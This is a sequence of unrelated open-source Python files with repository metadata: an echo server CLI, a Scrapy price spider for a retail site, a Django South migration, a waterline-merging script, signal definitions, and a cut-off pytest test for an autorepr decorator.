"max_line_length": 74,
"avg_line_length": 23.05263157894737,
"alnum_prop": 0.5844748858447488,
"repo_name": "kiriakosv/movie-recommendator",
"id": "7e7b1dcccd58e4990efd937f1594fbfbb8b6429f",
"size": "462",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "moviesite/movielists/migrations/0007_auto_20150412_1319.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2101"
},
{
"name": "HTML",
"bytes": "9505"
},
{
"name": "Python",
"bytes": "36726"
}
],
"symlink_target": ""
}
|
"""
rcecho - runs a robotcomm echo server as a console application.
Author: JMJ
"""
import argparse
import logging
import pprint
import re
import sys
import time
from robotutils import logging_helper
from robotutils.comm_helper import EchoServer
_LOGGER = logging.getLogger('rcecho')
_TRACE = logging_helper.LevelSpecificLogger(logging_helper.TRACELEVEL, _LOGGER)
def generate_argparser():
"""Generate the argument parser for this utility"""
parser = argparse.ArgumentParser(description='Robotcomm echo server',
allow_abbrev=False)
# Just one positional argument
parser.add_argument('server_address', help='hostname[:port] of this server')
parser.add_argument('-c', dest='channel', metavar='CHANNEL',
help='name of channel')
choices_text = "TRACE DEBUG INFO WARNING ERROR CRITICAL"
choices_list = choices_text.split()
loglevel_help = 'sets logging level. LOGLEVEL is one of: ' + choices_text
parser.add_argument('-loglevel', default='ERROR', choices=choices_list,
help=loglevel_help)
return parser
def parse_args(args):
"""Parse input args, including all error handling.
Returns a parameters object on success. Exits program
on failure.
"""
parser = generate_argparser()
params = parser.parse_args(args)
try:
hostname, port = parse_address(params.server_address)
params.hostname = hostname
params.port = port
except ValueError as exp:
parser.error(str(exp))
return params
# Note: IPv6 addresses are not supported - it would
# be extra work to distinguish a port from a ':' inside
# the IPv6 address.
_HOSTNAME_REGEX = re.compile(r'(\w|\.)+')
_PORTRANGE = 41 # Range 41000-41999
def parse_address(address):
"""Parse address of the form hostname[:port]"""
errmsg = '\n'.join(("Invalid address '{}'".format(address),
"Hostname should have the form NAME_OR_IP[:PORT]"))
hostname, *rest = address.split(':')
if not _HOSTNAME_REGEX.fullmatch(hostname) or len(rest) > 1:
raise ValueError(errmsg)
port = int(rest[0]) if rest else None
if port is not None and port//1000 != _PORTRANGE:
msg = "Port must be in the range {} to {}"
minport = _PORTRANGE*1000
raise ValueError(msg.format(minport, minport+999))
return (hostname, port)
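# Examples of the accepted forms (ports must fall in the 41000-41999 range):
#
#     parse_address('myhost')         # -> ('myhost', None)
#     parse_address('myhost:41001')   # -> ('myhost', 41001)
#     parse_address('myhost:8080')    # raises ValueError (port out of range)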
def send_messages(client, count):
"""Send messages using an instance of echo client"""
receive_count = 0
def send_handler(resptype, respbody):
msg = "Sending: '{}::{}'".format(resptype, respbody)
_TRACE(msg)
print(msg)
def response_handler(resptype, respbody):
msg = "Response: '{}::{}'".format(resptype, respbody)
_TRACE(msg)
print(msg)
nonlocal receive_count
        receive_count += 1 # assume call to handler is serialized
# send_messages will block until done...
_TRACE("GOING TO SEND MESSAGES")
client.send_messages(count, send_handler=send_handler,
response_handler=response_handler)
_TRACE("DONE SENDING MESSAGES")
print("Received = {}".format(receive_count))
def set_loglevel(strloglevel):
"""Sets up logging with the specified logging level"""
if strloglevel == 'TRACE':
# Special case - not defined in logging module
level = logging_helper.TRACELEVEL
else:
choices = "DEBUG INFO WARNING ERROR CRITICAL".split()
index = choices.index(strloglevel)
level = getattr(logging, choices[index])
logging.basicConfig(level=level)
def main(args):
"""Main entry point"""
params = parse_args(args)
set_loglevel(params.loglevel)
_LOGGER.info("parameters:\n%s", pprint.pformat(vars(params)))
server = EchoServer(params.hostname)
server.start()
try:
while True:
server.periodic_work()
time.sleep(0.1)
except KeyboardInterrupt:
_LOGGER.info("KeyboardInterrupt raised. Quitting")
finally:
server.stop()
if __name__ == '__main__':
    main(sys.argv[1:])
|
{
"content_hash": "13976e7f5014ad7afc9e670e3e14dcd7",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 80,
"avg_line_length": 31.728682170542637,
"alnum_prop": 0.6474468604935255,
"repo_name": "josephmjoy/robotics",
"id": "0d12eedc13f7df309a2e5db98162d1af0b35dc1f",
"size": "4102",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python_robotutils/rcecho.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Java",
"bytes": "337000"
},
{
"name": "Processing",
"bytes": "19397"
},
{
"name": "Python",
"bytes": "169462"
}
],
"symlink_target": ""
}
|
__author__ = 'juraseg'
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request
from product_spiders.items import Product, ProductLoader
import logging
class CometCoUkSpider(BaseSpider):
name = 'comet.co.uk'
allowed_domains = ['comet.co.uk']
start_urls = (
'http://www.comet.co.uk/',
)
search_url = 'http://www.comet.co.uk/webapp/wcs/stores/servlet/SearchResultsDisplayView?storeId=10151&catalogId=10002&langId=-1&searchTerm='
keywords = ['Sagemcom', 'Sagem']
products = [
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-HDR-FOX-T2-Freeview-freesat-Recorder/680052',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-HDR-FOX-T2/1TB-Freeview-freesat-Recorder/735736',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-FOXSAT-HDR500-Freeview-freesat-Recorder/712930',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-PANASONIC-DMR-HW100EBK-Freeview-freesat-Recorder/767913',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAMSUNG-SMT-S7800-Freeview-freesat-Recorder/701467',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAGEMCOM-RTI90-320-Freeview-freesat-Recorder/621994',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-PVR9300T/500-Freeview-freesat-Recorder/787388',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SONY-SVRHDT500B.CEK-Freeview-freesat-Recorder/700665',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAGEMCOM-RTI95-320-Freeview-freesat-Recorder/664121',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-PHILIPS-HDTP8530-Freeview-freesat-Recorder/600339',
]
def start_requests(self):
for keyword in self.keywords:
url = self.search_url + keyword
request = Request(url, callback=self.parse_search)
yield request
for url in self.products:
yield Request(url, callback=self.parse_product)
def parse_product(self, response):
hxs = HtmlXPathSelector(response)
url = response.url
name = hxs.select("//div[@id='product-content']//div[@id='product-header']/h1//text()").extract()
if not name:
logging.error("ERROR! NO NAME! %s" % url)
return
name = " ".join(name)
price = hxs.select("//div[@id='product-content']//div[@id='productPrice']//p[@id='product-price']/text()").extract()
if not price:
logging.error("ERROR! NO PRICE! %s %s" % (url, name))
return
price = price[0]
        loader = ProductLoader(item=Product(), response=response)
        loader.add_value('identifier', name)
        loader.add_value('name', name)
        loader.add_value('url', url)
        loader.add_value('price', price)
        yield loader.load_item()
def parse_search(self, response):
hxs = HtmlXPathSelector(response)
# parse pages
pages = hxs.select("//ul[@id='pagination']/li/a/@href").extract()
for page in pages:
request = Request(page, callback=self.parse_search)
yield request
# parse products
items = hxs.select("//div[@class='column_one grid_list']/div")
for item in items:
name = item.select("div/div[@class='info']/div/h2/a/text()").extract()
if not name:
continue
name = name[0]
url = item.select("div/div[@class='info']/div/h2/a/@href").extract()
if not url:
logging.error("ERROR! NO URL! URL: %s. NAME: %s" % (response.url, name))
continue
url = url[0]
price = item.select("div/div[@class='pricebox']/p[@id='product-price']/text()").extract()
if not price:
logging.error("ERROR! NO PRICE! URL: %s. NAME: %s" % (response.url, name))
continue
price = price[0]
            loader = ProductLoader(item=Product(), response=response)
            loader.add_value('identifier', name)
            loader.add_value('name', name)
            loader.add_value('url', url)
            loader.add_value('price', price)
            yield loader.load_item()
|
{
"content_hash": "5e4dc808e5f98492d81bcc44a37106d3",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 144,
"avg_line_length": 42.18811881188119,
"alnum_prop": 0.6153485097394977,
"repo_name": "ddy88958620/lib",
"id": "c32f2e02f90c0d4f2a22f5a1ce2d0f58124bc7cc",
"size": "4261",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Python/scrapy/sagemcom/cometcouk.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'User.id_card'
db.add_column(u'intranet_user', 'id_card',
self.gf('django.db.models.fields.CharField')(default='', max_length=256, blank=True),
keep_default=False)
# Adding field 'User.color'
db.add_column(u'intranet_user', 'color',
self.gf('django.db.models.fields.CharField')(default='', max_length=7, blank=True),
keep_default=False)
# Adding field 'User.twitter_account'
db.add_column(u'intranet_user', 'twitter_account',
self.gf('django.db.models.fields.CharField')(default='', max_length=256, blank=True),
keep_default=False)
# Adding field 'User.mobile'
db.add_column(u'intranet_user', 'mobile',
self.gf('django.db.models.fields.CharField')(default='', max_length=12, blank=True),
keep_default=False)
# Adding field 'User.phone'
db.add_column(u'intranet_user', 'phone',
self.gf('django.db.models.fields.CharField')(default='', max_length=12, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'User.id_card'
db.delete_column(u'intranet_user', 'id_card')
# Deleting field 'User.color'
db.delete_column(u'intranet_user', 'color')
# Deleting field 'User.twitter_account'
db.delete_column(u'intranet_user', 'twitter_account')
# Deleting field 'User.mobile'
db.delete_column(u'intranet_user', 'mobile')
# Deleting field 'User.phone'
db.delete_column(u'intranet_user', 'phone')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'intranet.assignation': {
'Meta': {'unique_together': "(('employee', 'project'),)", 'object_name': 'Assignation'},
'cost': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'employee': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['intranet.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['intranet.Project']"})
},
u'intranet.client': {
'Meta': {'ordering': "['name']", 'object_name': 'Client'},
'contact_person': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'employees_number': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'sector': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'clients'", 'to': u"orm['intranet.Sector']"}),
'ubication': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'})
},
u'intranet.holidaysrequest': {
'Meta': {'object_name': 'HolidaysRequest'},
'beginning': ('django.db.models.fields.DateField', [], {}),
'comments': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'employee': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'holidays_requests'", 'to': u"orm['intranet.User']"}),
'ending': ('django.db.models.fields.DateField', [], {}),
'flexible_dates': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'year': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'holidays_requests'", 'to': u"orm['intranet.HolidaysYear']"})
},
u'intranet.holidaysyear': {
'Meta': {'object_name': 'HolidaysYear'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
u'intranet.invoice': {
'Meta': {'ordering': "['estimated_through_date']", 'object_name': 'Invoice'},
'client': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invoices'", 'to': u"orm['intranet.Client']"}),
'comments': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'concept': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'estimated_perception_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'estimated_through_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice_file': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'iva': ('django.db.models.fields.FloatField', [], {'default': '0.21'}),
'number': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'payment': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'payment_conditions': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255', 'blank': 'True'}),
'perception_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'perception_state': ('django.db.models.fields.IntegerField', [], {'default': '-10'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invoices'", 'to': u"orm['intranet.Project']"}),
'quantity': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'quantity_iva': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'through_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
u'intranet.part': {
'Meta': {'ordering': "['-year', '-month']", 'unique_together': "(('month', 'year', 'employee'),)", 'object_name': 'Part'},
'data': ('picklefield.fields.PickledObjectField', [], {'default': '{}'}),
'employee': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parts'", 'to': u"orm['intranet.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'month': ('django.db.models.fields.IntegerField', [], {}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'parts'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['intranet.Project']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'state': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
u'intranet.project': {
'Meta': {'ordering': "['name']", 'object_name': 'Project'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'client': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'project'", 'to': u"orm['intranet.Client']"}),
'description': ('django.db.models.fields.TextField', [], {}),
'employees': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'projects'", 'default': 'None', 'to': u"orm['intranet.User']", 'through': u"orm['intranet.Assignation']", 'symmetrical': 'False', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'is_holidays': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_month_activity': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '600'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'subscribers': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'subscribed_projects'", 'default': 'None', 'to': u"orm['intranet.User']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'total_income': ('django.db.models.fields.FloatField', [], {'default': '0'})
},
u'intranet.quote': {
'Meta': {'ordering': "['-created_date']", 'object_name': 'Quote'},
'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'quotes_created'", 'null': 'True', 'to': u"orm['intranet.User']"}),
'employee': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'quotes'", 'null': 'True', 'to': u"orm['intranet.User']"}),
'explanation': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'external_author': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'quote': ('django.db.models.fields.TextField', [], {}),
'users_rates': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'quotes_rated'", 'default': 'None', 'to': u"orm['intranet.User']", 'through': u"orm['intranet.QuoteScore']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'})
},
u'intranet.quotescore': {
'Meta': {'unique_together': "(('user', 'quote'),)", 'object_name': 'QuoteScore'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'quote': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'scores'", 'to': u"orm['intranet.Quote']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'quote_scores'", 'to': u"orm['intranet.User']"})
},
u'intranet.sector': {
'Meta': {'ordering': "['name']", 'object_name': 'Sector'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'intranet.specialday': {
'Meta': {'ordering': "['date']", 'object_name': 'SpecialDay'},
'date': ('django.db.models.fields.DateField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'intranet.talk': {
'Meta': {'object_name': 'Talk'},
'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'duration': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'event_date': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'obsolete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'place': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '150', 'null': 'True', 'blank': 'True'}),
'talkers': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'talks_offers'", 'default': 'None', 'to': u"orm['intranet.User']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'talkers_are_ready': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'wanters': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'talks_wanted'", 'default': 'None', 'to': u"orm['intranet.User']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'})
},
u'intranet.user': {
'Meta': {'object_name': 'User'},
'chargeability_cost': ('django.db.models.fields.FloatField', [], {'default': '11'}),
'color': ('django.db.models.fields.CharField', [], {'max_length': '7', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'id_card': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_company_team': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'mobile': ('django.db.models.fields.CharField', [], {'max_length': '12', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '12', 'blank': 'True'}),
'profit_cost': ('django.db.models.fields.FloatField', [], {'default': '12'}),
'raw_cost': ('django.db.models.fields.FloatField', [], {'default': '10'}),
'reset_password_token': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '40', 'blank': 'True'}),
'twitter_account': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
}
}
complete_apps = ['intranet']
|
{
"content_hash": "3f1409cc361f2070cc213c2ee9266c70",
"timestamp": "",
"source": "github",
"line_count": 226,
"max_line_length": 267,
"avg_line_length": 77.11061946902655,
"alnum_prop": 0.5508119584552705,
"repo_name": "kaleidos/intranet",
"id": "03f2161162b99f6b608025bbf4117441a3fa8eca",
"size": "17451",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "backend/intranet/migrations/0013_auto__add_field_user_id_card__add_field_user_color__add_field_user_twi.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "92307"
},
{
"name": "CoffeeScript",
"bytes": "65346"
},
{
"name": "JavaScript",
"bytes": "300775"
},
{
"name": "PHP",
"bytes": "1052"
},
{
"name": "Perl",
"bytes": "35147"
},
{
"name": "Python",
"bytes": "753185"
},
{
"name": "Ruby",
"bytes": "503"
},
{
"name": "Shell",
"bytes": "1389"
}
],
"symlink_target": ""
}
|
from __future__ import division
from builtins import str
from builtins import range
from past.utils import old_div
from numpy import *
def interpolate(master,slave1,slave2):
if master[0]<-999:
return array([slave1[0],abs(slave1[1]),slave1[2]])
x = master[0]
alpha = old_div((x-slave1[0]),(slave2[0]-slave1[0]))
y = 0.5*(abs(master[1]) + abs((1.0-alpha)*slave1[1] + alpha*slave2[1]) )
z = 0.5*(master[2] + (1.0-alpha)*slave1[2] + alpha*slave2[2] )
return array([x,y,z])
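# Worked example of the blend above (values are illustrative): with
# master=(0.5, 1.0, 0.0), slave1=(0.0, -2.0, 0.0), slave2=(1.0, -4.0, 1.0),
# alpha is 0.5, so y = 0.5*(|1.0| + |-3.0|) = 2.0 and z = 0.5*(0.0 + 0.5) = 0.25:
#
#     interpolate(array([0.5, 1.0, 0.0]),
#                 array([0.0, -2.0, 0.0]),
#                 array([1.0, -4.0, 1.0]))   # -> array([0.5, 2.0, 0.25])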
def mergeWaterline(size, step):
# Loop over procs to load waterline
for proc in range(size):
data = load('waterline.' + str(proc) + '.' + str(step) + '.npy')
if proc == 0:
waterline = data
else:
waterline = concatenate((waterline,data))
# Sort waterline
waterline.view('d8,d8,d8').sort(order=['f0'], axis=0)
# Write to file in ASCII mode
wlfile = open("waterline." + str(step) +".dat",'w')
pos = array([-9999,-9999,-9999])
neg = array([-9999,-9999,-9999])
for wl in waterline:
if wl[1]<0:
cur = interpolate(pos,wl,neg)
neg = wl
else:
cur = interpolate(neg,wl,pos)
pos = wl
wlfile.write('%12.5E %12.5E %12.5E\n'% (cur[0],cur[1],cur[2]))
wlfile.close()
if __name__ == '__main__':
from optparse import OptionParser
usage = ""
parser = OptionParser(usage=usage)
parser.add_option("-n","--size",
help="number of processors for run",
action="store",
type="int",
dest="size",
default=1)
parser.add_option("-s","--stride",
help="stride for solution output",
action="store",
type="int",
dest="stride",
default=0)
parser.add_option("-t","--time",
help="finaltime",
action="store",
type="int",
dest="finaltime",
default=1000)
(opts,args) = parser.parse_args()
start = 0
if opts.stride == 0:
mergeWaterline(opts.size,opts.finaltime)
elif opts.stride > 0:
for step in range(0,opts.finaltime+1,opts.stride):
mergeWaterline(opts.size,step)
|
{
"content_hash": "d6c14c9cb9c782ea5c911da8de1c6a78",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 77,
"avg_line_length": 25.53684210526316,
"alnum_prop": 0.5032976092333058,
"repo_name": "erdc/proteus",
"id": "b69f425026839b92ce05f7a1cbd35e89fe851aaa",
"size": "2449",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "scripts/extractWaterline.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "2790"
},
{
"name": "Asymptote",
"bytes": "1569"
},
{
"name": "C",
"bytes": "2827957"
},
{
"name": "C++",
"bytes": "7262408"
},
{
"name": "Cython",
"bytes": "154607"
},
{
"name": "Dockerfile",
"bytes": "2738"
},
{
"name": "Fortran",
"bytes": "51671"
},
{
"name": "Jupyter Notebook",
"bytes": "33357"
},
{
"name": "Makefile",
"bytes": "19043"
},
{
"name": "Python",
"bytes": "12534530"
},
{
"name": "Roff",
"bytes": "322"
},
{
"name": "Shell",
"bytes": "14084"
}
],
"symlink_target": ""
}
|
from django.dispatch import Signal
transfer_completed = Signal(providing_args=['instance'])
transfer_failed = Signal(providing_args=['instance'])
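
# A sketch of how a receiver might hook into these signals (the receiver name
# and sender model are illustrative, not part of this module):
#
#     from django.dispatch import receiver
#
#     @receiver(transfer_completed)
#     def on_transfer_completed(sender, instance=None, **kwargs):
#         ...  # e.g. log or notify that `instance` finished transferring
#
# and how a sender would fire them:
#
#     transfer_completed.send(sender=Experiment, instance=experiment)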
|
{
"content_hash": "4769bef374566f3b5fcc8a19e172eaf8",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 56,
"avg_line_length": 36.75,
"alnum_prop": 0.782312925170068,
"repo_name": "iiman/mytardis",
"id": "585ac4a1f0f6f228e3c4738959d0583a1a263b21",
"size": "147",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tardis/apps/sync/signals.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "308165"
},
{
"name": "Python",
"bytes": "1736671"
},
{
"name": "Shell",
"bytes": "953"
}
],
"symlink_target": ""
}
|
import django.dispatch
# pylint: disable-msg=C0103
emitted_notices = django.dispatch.Signal(
providing_args=["batches", "sent", "sent_actual", "run_time"]
)
|
{
"content_hash": "a3b0d9eaa3aca1ca51b516854e977f79",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 65,
"avg_line_length": 23.285714285714285,
"alnum_prop": 0.7116564417177914,
"repo_name": "GeoNode/geonode-notification",
"id": "ac3f6487ba4d7aeceef529b5a26e70f9e705ff32",
"size": "163",
"binary": false,
"copies": "14",
"ref": "refs/heads/master",
"path": "notification/signals.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "2306"
},
{
"name": "Python",
"bytes": "47293"
}
],
"symlink_target": ""
}
|
import sys
import pytest
from autoclass import autorepr
@pytest.mark.skipif(sys.version_info < (3, 6), reason="class vars order is not preserved")
@pytest.mark.parametrize('only_public_fields', [True, False], ids=lambda x: 'only_public' if x else 'including class-private dunder fields')
@pytest.mark.parametrize('only_known_fields', [True, False], ids=lambda x: 'only_constructor_args' if x else 'all_obj_fields')
@pytest.mark.parametrize("curly_mode", [False, True], ids="curly_mode={}".format)
def test_autorepr(only_known_fields, only_public_fields, curly_mode):
""" @autorepr functionality with various customization options for only_constructor_args/only_public_fields """
if curly_mode:
def format_pairs(cls, pairs):
return "%s(**{%s})" % (cls.__name__, ", ".join(["%r: %r" % pair for pair in pairs]))
else:
def format_pairs(cls, pairs):
return "%s(%s)" % (cls.__name__, ", ".join(["%s=%r" % pair for pair in pairs]))
@autorepr(only_known_fields=only_known_fields, only_public_fields=only_public_fields, curly_string_repr=curly_mode)
class FooConfigA(object):
dummy_class_field = 'just to be sure it does not appear'
def __init__(self,
a, # type: str,
b # type: List[str]
):
self.a = a
self.b = b
self.c = 't'
self._weak_private = 'r'
self.__class_private = 't'
def dummy_func(self):
""" we create this just to be sure the function is not in the dict view """
pass
t = FooConfigA('rhubarb', ['pie', 'pie2'])
t.new_field = 0
t._new_field_weak_private = 1
t.__new_field_class_private_incorrect = 0
class Dummy:
t.__new_field_class_private = 1
# check the str/repr
assert str(t) == repr(t)
if only_known_fields:
pairs = [('a', 'rhubarb'), # only the two constructor fields appear
('b', ['pie', 'pie2'])]
elif only_public_fields:
pairs = [('a', 'rhubarb'),
('b', ['pie', 'pie2']),
('c', 't'),
# _FooConfigA__class_private should not appear
('new_field', 0)
#'_weak_private': 'r',
